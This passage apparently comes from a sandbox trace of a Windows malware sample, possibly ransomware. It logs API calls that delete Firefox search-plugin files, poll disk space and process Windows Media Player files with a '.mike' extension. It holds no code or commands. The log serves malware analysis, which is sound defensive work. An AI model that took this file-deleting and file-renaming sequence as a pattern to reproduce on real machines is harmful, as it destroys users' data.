(lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\bing.xml", dwFileAttributes=0x80) returned 1 [0128.819] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\bing.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\bing.xml")) returned 1 [0128.822] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0128.826] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\eBay.xml", dwFileAttributes=0x80) returned 1 [0128.827] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\eBay.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\ebay.xml")) returned 1 [0128.830] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0128.835] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\google.xml", dwFileAttributes=0x80) returned 1 [0128.835] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\google.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\google.xml")) returned 1 [0128.838] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0128.843] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\twitter.xml", dwFileAttributes=0x80) returned 1 [0128.843] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\twitter.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\twitter.xml")) returned 1 [0128.846] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0128.851] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\wikipedia.xml", dwFileAttributes=0x80) returned 1 [0128.851] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\wikipedia.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\wikipedia.xml")) returned 1 [0128.854] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0128.859] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\yahoo.xml", dwFileAttributes=0x80) returned 1 [0128.860] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\yahoo.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\yahoo.xml")) returned 1 [0128.862] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.862] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.862] CoTaskMemFree (pv=0x508980) [0128.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.864] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.864] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.864] CoTaskMemFree (pv=0x508980) [0128.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.865] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.865] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.865] CoTaskMemFree (pv=0x508980) [0128.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.866] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.866] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.866] CoTaskMemFree (pv=0x508980) [0128.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.868] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.868] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.868] CoTaskMemFree (pv=0x508980) [0128.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.868] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.868] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.869] CoTaskMemFree (pv=0x508980) [0128.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.872] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.872] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.872] CoTaskMemFree (pv=0x508980) [0128.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.873] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.873] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.873] CoTaskMemFree (pv=0x508980) [0128.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.874] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.874] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.874] CoTaskMemFree (pv=0x508980) [0128.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.877] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.878] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.878] CoTaskMemFree (pv=0x508980) [0128.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.878] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.878] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.878] CoTaskMemFree (pv=0x508980) [0128.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.879] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.879] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.879] CoTaskMemFree (pv=0x508980) [0128.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.879] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.879] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.880] CoTaskMemFree (pv=0x508980) [0128.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.880] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.880] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.880] CoTaskMemFree (pv=0x508980) [0128.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.880] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.880] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.881] CoTaskMemFree (pv=0x508980) [0128.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.881] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.881] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.881] CoTaskMemFree (pv=0x508980) [0128.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.882] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.882] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.882] CoTaskMemFree (pv=0x508980) [0128.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.886] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.886] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.887] CoTaskMemFree (pv=0x508980) [0128.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.888] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.888] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.888] CoTaskMemFree (pv=0x508980) [0128.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.889] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.889] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.889] CoTaskMemFree (pv=0x508980) [0128.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.890] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.890] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.890] CoTaskMemFree (pv=0x508980) [0128.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.891] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.891] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.891] CoTaskMemFree (pv=0x508980) [0128.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adfa0) returned 1 [0128.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af09c) returned 1 [0128.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0128.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0128.905] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0128.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0128.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0128.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0128.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0128.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0128.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0128.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0128.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0128.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0128.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0128.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0128.907] WriteFile (in: hFile=0x288, lpBuffer=0x21439a8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21439a8*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0128.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0128.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0128.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0128.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0128.909] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0128.913] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0128.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0128.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0128.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0128.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0128.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0128.915] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0128.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0128.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0128.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0128.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0128.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0128.917] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\avtransport.xml", dwFileAttributes=0x80) returned 0 [0128.918] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\avtransport.xml", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\avtransport.xml", lpFilePart=0x0) returned 0x4a [0128.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b8) returned 1 [0128.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0b4) returned 1 [0128.919] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\avtransport.xml.mike" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\avtransport.xml.mike")) returned 1 [0128.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0128.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adfa0) returned 1 [0128.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af09c) returned 1 [0128.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0128.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0128.922] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0128.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0128.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0128.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0128.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0128.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0128.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0128.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0128.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0128.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0128.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0128.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0128.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0128.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0128.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0128.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0128.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0128.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0128.928] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0128.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0128.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0128.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0128.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0128.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0128.930] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", dwFileAttributes=0x80) returned 0 [0128.931] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", lpFilePart=0x0) returned 0x54 [0128.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b8) returned 1 [0128.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0b4) returned 1 [0128.931] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.mike" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\connectionmanager_dmr.xml.mike")) returned 1 [0128.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0128.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adfa0) returned 1 [0128.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af09c) returned 1 [0128.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0128.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0128.934] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0128.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0128.935] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0128.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0128.935] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0128.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0128.935] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0128.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0128.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0128.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0128.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0128.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0128.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0128.938] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0128.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0128.938] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0128.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0128.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0128.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0128.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0128.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0128.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0128.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0128.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0128.942] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.jpg", dwFileAttributes=0x80) returned 0 [0128.943] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.jpg", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.jpg", lpFilePart=0x0) returned 0x46 [0128.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b8) returned 1 [0128.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0b4) returned 1 [0128.944] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.jpg.mike" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_120.jpg.mike")) returned 1 [0128.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0128.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adfa0) returned 1 [0128.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af09c) returned 1 [0128.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0128.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0128.947] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0128.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0128.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0128.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0128.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0128.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0128.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0128.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0128.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0128.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0128.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0128.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0128.950] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0128.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0128.950] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0128.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0128.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0128.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0128.954] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0128.954] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0128.954] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0128.954] 